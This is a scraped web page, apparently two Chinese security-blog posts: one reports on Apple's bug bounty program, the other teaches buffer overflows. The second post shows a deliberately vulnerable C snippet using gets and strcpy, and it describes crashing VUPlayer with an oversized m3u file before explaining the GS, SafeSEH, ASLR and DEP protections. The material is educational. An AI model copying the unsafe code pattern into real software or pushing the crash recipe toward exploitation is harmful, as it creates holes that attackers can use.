\u003E苹果发布赏金计划\u003C\u002Fb\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Cp\u003E在今年的Black Hat安全会议上,苹果公司终于向白帽子们伸出了橄榄枝,决定从今年秋季9月份起,开始实施漏洞赏金计划,鼓励安全研究者和白帽子非公开地向苹果公司报告苹果产品中存在的安全漏洞,对于高危型漏洞将支付最高20W美元的奖金。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&6af8d0a7f2a2dd52d5e69.png\& data-rawwidth=\&680\& data-rawheight=\&400\&\u003E\u003Cp\u003E但是该计划目前实行的是邀请制,只对曾向苹果报告过有价值的安全漏洞的白帽子开放,大约为20人左右。除此以外,计划覆盖的漏洞类型也很有限,只有以下5种:\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
1.安全引导固件中的漏洞(最高奖励20w美元)\u003C\u002Fp\u003E\u003Cp\u003E
2.能够从保护区域提取机密信息的漏洞(最高奖励10w美元)\u003C\u002Fp\u003E\u003Cp\u003E
3.能以内核权限执行任意代码的漏洞(最高奖励5w美元)\u003C\u002Fp\u003E\u003Cp\u003E
4.能够获取到苹果服务器上iCloud账户数据的漏洞(最高奖励5w美元)\u003C\u002Fp\u003E\u003Cp\u003E
5.越过沙盒获取用户数据的漏洞(最高奖励2.5w美元)\u003C\u002Fp\u003E\u003Cu\u003E\u003Cb\u003E醉翁之意不在酒\u003C\u002Fb\u003E\u003C\u002Fu\u003E\u003Cp\u003E
Facebook,微软,谷歌几年前就相继发布其漏洞赏金计划,而苹果为什么时至今日,才发布呢?\u003C\u002Fp\u003E\u003Cimg src=\&4b5c750e69e11c1f50b51ab6b34eb3b7.jpg\& data-rawwidth=\&500\& data-rawheight=\&289\&\u003E\u003Cp\u003E因为苹果公司之前总觉得这种计划是没有意义的。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
各国政府和黑市一直以来都在高价竞购苹果产品中的安全漏洞0day,比如今年早些时候,美国联邦调查局(FBI)就为了解锁嫌疑人iPhone,而向一个第三方科技公司支付超过100w美元。\u003C\u002Fp\u003E\u003Cimg src=\&f93a53f01abfc31.jpg\& data-rawwidth=\&512\& data-rawheight=\&288\&\u003E\u003Cp\u003E苹果公司认为,如果你的出价永远都超不过其它买家,那么出价的意义在哪呢?\u003C\u002Fp\u003E\u003Cp\u003E
20W美元无疑是一笔很高的奖金,但是它还是远远低于政府和黑市中给出的价格,所以苹果本次推出其漏洞赏金计划,更多的是向世界展示自己开放的安全态度,并缓和与白帽子们的关系。\u003C\u002Fp\u003E\u003Cp\u003E
在这之前,苹果已经连续4年没有派遣代表出席Black Hat安全大会了,苹果产品安全方面的话题,公司会选择在自己的全球开发者大会上发布。\u003C\u002Fp\u003E\u003Cimg src=\&5f2f070fc75d689815ccbfbfda67b6bc.png\& data-rawwidth=\&363\& data-rawheight=\&188\&\u003E\u003Cp\u003E而本届的Black Hat会议中,苹果派其网络安全架构师Ivan Krstic作为参会代表。\u003C\u002Fp\u003E\u003Cp\u003E
Ivan Krstic称,苹果将逐步向外界开放其网络安全架构,增强其透明性,并为乐于改进苹果系统安全性的黑客,安全研究人员和密码学专家敞开大门。\u003C\u002Fp\u003E\u003Cp\u003E
Ivan Krstic还在会议上谈到了苹果的HomeKit,AutoUnlock以及iCloud keychain的安全特性,这在苹果历史上都是比较罕见的。\u003C\u002Fp\u003E\u003Cp\u003E
苹果公司和外界安全研究人员的关系一直以来都很僵硬,而此次苹果公司在Black Hat上的表现,标志着苹果迈出了其重要的一步。\u003C\u002Fp\u003E\u003Cimg src=\&083655cbb4da7b3f1549.jpg\& data-rawwidth=\&550\& data-rawheight=\&309\&\u003E\u003Cp\u003E另一方面,苹果公司内部的安全人员感觉挖掘苹果产品中潜在漏洞的过程变得越来越吃力,已经不能保证可以及时挖掘出潜在漏洞并予以修复。所以苹果公司还有可能是接受了内部安全人员的建议,开始鼓励外界白帽子协助苹果公司提高其产品安全性。\u003C\u002Fp\u003E\u003Cp\u003E
所以综合来讲,苹果本次发布漏洞赏金计划,更多的是向世界展示其开放的安全态度,说到这里,不得不提一下同程SRC的开明的安全态度,小编认为同程SRC是众SRC学习的楷模。\u003C\u002Fp\u003E\u003Cp\u003E
你们是如何看待苹果公司在安全态度方面的进步呢?对于国内外SRC有哪些看法呢?还有,你们认为目前国内的SRC有哪些优点和不足呢?欢迎留言讨论~\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E\u003Cstrong\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\&\u003E\u003Cstrong\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E\u003Cstrong\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f29be84d7fe449e30589c13b&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽黑客成长独白:301消失的那几年\&\u003E\u003Cstrong\u003E白帽黑客成长独白:301消失的那几年\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=39ff41af1dc1e761f593bec52e51c870&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&邻居说WiFi安全不重要,结果被“黑”傻了\&\u003E\u003Cstrong\u003E邻居说WiFi安全不重要,结果被“黑”傻了\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=3943ebdb52ef287eb3bde&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&美女iPhone丢了后,黑客跟妹子干了这样一件事\&\u003E\u003Cstrong\u003E美女iPhone丢了后,黑客跟妹子干了这样一件事\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=48dc75d93bbee235b6e234&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&不看后悔:为什么企业招不到安全人才?你知道吗?\&\u003E\u003Cstrong\u003E不看后悔:为什么企业招不到安全人才?你知道吗?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E8、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=6fbb1ac6ccf9e096c3da329&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&我有笔钱,想给你。\&\u003E\u003Cstrong\u003E我有笔钱,想给你。\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003Ehttp:\u002F\u002Fweixin.qq.com\u002Fr\u002F8kVZQQjEDlVxrUwi9xDg (二维码自动识别)\u003C\u002Fp\u003E&,&updated&:new Date(&T12:11:09.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:0,&likeCount&:2,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T20:11:09+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic1.zhimg.com\u002Ff48fb8bd02f_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:0,&likesCount&:2},&&:{&title&:&浅谈缓冲区溢出&,&author&:&hi_301&,&content&:&\u003Cp\u003E\u003Cb\u003E作者简介\u003C\u002Fb\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003ENetfairy,本科在读学生,白帽子,曾在看雪论坛发布过十余篇经典漏洞分析文章。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E正文\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
1988年,世界上第一个缓冲区溢出攻击--Morris蠕虫在互联网上泛滥,短短一夜的时间全世界6000多台网络服务器瘫痪或半瘫痪,不计其数的数据和资料被毁。造成一场损失近亿美元的空前大劫难!\u003C\u002Fp\u003E\u003Cp\u003E
那么,缓冲区溢出到底是怎么一回事呢?\u003C\u002Fp\u003E\u003Cp\u003E
缓冲区溢出就好比一个杯子倒太多的水,洒出来,这叫溢出。它是一种非常普遍、非常危险的漏洞,最常出现在C\u002FC++编写的程序中。\u003C\u002Fp\u003E\u003Cp\u003E
早期,人们还不那么重视安全的时候,往往会\u003Cstrong\u003E使用像strcpy这类不安全函数\u003C\u002Fstrong\u003E,这种函数\u003Cstrong\u003E对用户的输入不作任何检查\u003C\u002Fstrong\u003E,总之,来自不拒,那么,分配的内存空间是有限的,如果输入超长的字符串,必然会导致溢出。\u003C\u002Fp\u003E\u003Cimg src=\&8c615db5fe436d193d5e.png\& data-rawwidth=\&605\& data-rawheight=\&513\&\u003E\u003Cp\u003E讲了这么多,小伙伴会不会有点晕吗?其实,缓冲区溢出很容易理解的。下面我们看一个具体的例子:\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003E#include&stdio.h&\u003C\u002Fp\u003E\u003Cp\u003E#include&string.h&\u003C\u002Fp\u003E\u003Cp\u003Eint main()\u003C\u002Fp\u003E\u003Cp\u003E{\u003C\u002Fp\u003E\u003Cp\u003E\tchar str[8];\u003C\u002Fp\u003E\u003Cp\u003E\tchar input[256];\u003C\u002Fp\u003E\u003Cp\u003E\tgets(input);\u003C\u002Fp\u003E\u003Cp\u003E\tstrcpy(str,input);\u003C\u002Fp\u003E\u003Cp\u003E\treturn 0;\u003C\u002Fp\u003E\u003Cp\u003E}\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E这段代码存在一个经典的\u003Cstrong\u003E缓冲区溢出漏洞strcpy\u003C\u002Fstrong\u003E,为str变量分配了8个字节的空间,输入小于等于8个字符,那没问题:\u003C\u002Fp\u003E\u003Cimg src=\&3fc944fd3d3a790fd3d839.png\& data-rawwidth=\&611\& data-rawheight=\&295\&\u003E\u003Cp\u003E但是当我们输入超长的数据时,问题出现了\u003C\u002Fp\u003E\u003Cimg src=\&ee099b95e5.png\& data-rawwidth=\&662\& data-rawheight=\&478\&\u003E\u003Cp\u003E\u003Cb\u003E缓冲区溢出带来的危害:\u003Cbr\u003E\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E上面是我们自己写的程序,存在漏洞这没什么大惊小怪并不会造成什么恶劣的影响。但是,如果问题出现在我们常用的一些软件,比如操作系统,浏览器,QQ,那后果不堪想象。\u003C\u002Fp\u003E\u003Cp\u003E缓冲区溢出中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返回时\u003Cstrong\u003E改变返回程序的地址\u003C\u002Fstrong\u003E,让其\u003Cstrong\u003E跳转到任意地址\u003C\u002Fstrong\u003E,带来的危害一种是\u003Cstrong\u003E程序崩溃\u003C\u002Fstrong\u003E导致拒绝服务,另外一种就是跳转并且\u003Cstrong\u003E执行一段恶意代码\u003C\u002Fstrong\u003E,比如得到系统权限,然后为所欲为。\u003C\u002Fp\u003E\u003Cp\u003E利用缓冲区溢出攻击,可以\u003Cstrong\u003E导致程序运行失败、系统宕机、重新启动\u003C\u002Fstrong\u003E等后果。更为严重的是,它可被利用来\u003Cstrong\u003E执行非授权指令\u003C\u002Fstrong\u003E,甚至可以取得系统特权,进而进行各种非法操作。\u003C\u002Fp\u003E\u003Cp\u003E有可能小伙伴你会对病毒\u002F蠕虫没有概念,那我们来举一个简单的例子吧。平时玩电脑的时候,你正在听歌,突然间收到未知的“朋友”发给你的一个m3u音频文件,并引导你进行电击——“这首歌很好听呢,你也听听”。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E凑巧的是,你电脑刚好了就装了VUPlayer.exe 这个播放器\u003C\u002Fstrong\u003E,不多想,就打开这个音乐想听听看,奇怪的是,软件闪了一下就退出了,你以为是文件损坏了了吧。其实,这个时候,你已经被黑了,没错!这就是那个播放器。\u003C\u002Fp\u003E\u003Cimg src=\&296c7cf2bf6db49d8aa71d.png\& data-rawwidth=\&590\& data-rawheight=\&401\&\u003E\u003Cp\u003E很普通的播放器,但是它\u003Cstrong\u003E存在致命缓冲区溢出漏洞\u003C\u002Fstrong\u003E。我们构造10000个A的m3u文件,然后用调试器附加VUPlayer.exe,打开文件:\u003C\u002Fp\u003E\u003Cimg src=\&d4d31a57bd055febbd40d8e.png\& data-rawwidth=\&774\& data-rawheight=\&475\&\u003E\u003Cp\u003E我们看到下面的内存全部被字符A覆盖了,其实就是使\u003Cstrong\u003E用了不安全的lstrcpyA函数导致溢出\u003C\u002Fstrong\u003E,这个是栈溢出,还有一种是堆溢出,但本质是一样的。\u003C\u002Fp\u003E\u003Cp\u003E证明有溢出漏洞之后,往往需要进一步分析写利用代码,不同的人目的不竟相同,类似我的很多安全爱好者之时弹弹计算器(在桌面上不停地弹出计算器工具),可是黑市上的人就会攻击你的系统,盗取机密文件等等。当然,这只是一个简单的实验。\u003C\u002Fp\u003E\u003Cp\u003E目前常见的保护措施:\u003C\u002Fp\u003E\u003Cp\u003E\t缓冲区攻击的日渐泛滥,微软并未任其张扬,陆陆续续推出了各种保存措施。其中重要的有GS,SafeSeh,ASLR,DEP等,接下来我们针对这些措施进行原理分析:\u003C\u002Fp\u003E\u003Cp\u003E\t①.GS保护原理:\u003C\u002Fp\u003E\u003Cp\u003E\t通过VC++编译器在函数前后\u003Cstrong\u003E添加额外的处理代码\u003C\u002Fstrong\u003E,前部分用于\u003Cstrong\u003E由伪随机数生成的cookie并放入.data节段\u003C\u002Fstrong\u003E,当本地变量初始化,就会向栈中插入cookie,它位于局部变量和返回地址之间在缓冲区溢出利用时,如果将恶意代码从局部变量覆盖到返回地址,那么自然就会覆写cookie,当检测到与原始cookie不同时,就会触发异常,最后终止进程。\u003C\u002Fp\u003E\u003Cp\u003E\t②.SafeSeh保护\u003C\u002Fp\u003E\u003Cp\u003E\t为了防止SEH节点被攻击者恶意利用,微软在.net编译器中\u003Cstrong\u003E加入\u002Fsdeseh编译选项引入SafeSEH技术\u003C\u002Fstrong\u003E。编译器在编译时将PE文件所有合法的异常处理例程的地址解析出来制成一张表,放在PE文件的数据块(LQAJ)一C0N—FIG)中,并使用shareuser内存中的一个随机数加密,用于匹配检查。\u003C\u002Fp\u003E\u003Cp\u003E\t如果该PE文件不支持safesEH,则表的地址为0。当PE文件被系统加载后,表中的内容被加密保存到ntdl1.dll模块的某个数据区。在PE文件运行期间,如果发生异常需要调用异常处理例程,系统会逐个检查该例程在表中是否有记录:如果没有则说明该例程非法,进而不执行该异常例程。\u003C\u002Fp\u003E\u003Cp\u003E③.ASLR保护\u003C\u002Fp\u003E\u003Cp\u003E\tASLR(地址空间布局随机化)技术的主要功能是通过\u003Cstrong\u003E对系统关键地址的随机化\u003C\u002Fstrong\u003E,防止攻击者在堆栈溢出后利用固定的地址定位到恶意代码并加以运行。\u003C\u002Fp\u003E\u003Cp\u003E④.DEP保护\u003C\u002Fp\u003E\u003Cp\u003E\t数据执行保护 (DEP) 是一套软硬件技术,能够\u003Cstrong\u003E在内存上执行额外检查\u003C\u002Fstrong\u003E以防止在不可运行的内存区域上执行代码\u003C\u002Fp\u003E\u003Cp\u003E这些保护机制的出现,一度使得攻击难度大大增加,但攻击者们也不是吃素的,他们也在研究绕过这些保护的办法。所谓千里之堤溃于蚁穴,对于上面的保护,攻击者只要找到了它们的一个弱点,便可以突破所有防线,实现攻击。\u003Cstrong\u003E攻击与防护,不断在对抗\u003C\u002Fstrong\u003E,可以预见,在未来一段时间,这种游戏还将持续上演。\u003C\u002Fp\u003E\u003Cp\u003E但是,现在的漏洞门槛比十年前高了N倍,笔者在实际中也常常遇到有漏洞却不能利用的情况。但是也不要灰心,老的技术被淘汰,新的技术又会出来,本属正常,但像缓冲区溢出这种经典的东西,无论什么时候,都值得我们学习。\u003C\u002Fp\u003E\u003Cp\u003E总结:\u003C\u002Fp\u003E\u003Cp\u003E目前来说,\u003Cstrong\u003E底层的漏洞缓冲区溢出还是占据较大比例\u003C\u002Fstrong\u003E,研究的人员相对于web来说少的可怜,主要是门槛比较高,但是学好了,回报也很高,所以骚年,不要犹豫,拿起你的电脑,跟我一起改变世界。\u003C\u002Fp\u003E\u003Cp\u003E读完了本文,小伙伴针对缓冲区溢出攻击的防御,你有什么别的思路呢?评论区留言,对该思路讨论点赞数最高者,有可爱的超人兔公仔抱回家哦。(正好明天七夕,送给女朋友还是留着自己玩都是不错的哦)\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E\u003Cstrong\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\&\u003E\u003Cstrong\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E\u003Cstrong\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f29be84d7fe449e30589c13b&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽黑客成长独白:301消失的那几年\&\u003E\u003Cstrong\u003E白帽黑客成长独白:301消失的那几年\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=39ff41af1dc1e761f593bec52e51c870&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&邻居说WiFi安全不重要,结果被“黑”傻了\&\u003E\u003Cstrong\u003E邻居说WiFi安全不重要,结果被“黑”傻了\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=3943ebdb52ef287eb3bde&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&美女iPhone丢了后,黑客跟妹子干了这样一件事\&\u003E\u003Cstrong\u003E美女iPhone丢了后,黑客跟妹子干了这样一件事\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=48dc75d93bbee235b6e234&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&不看后悔:为什么企业招
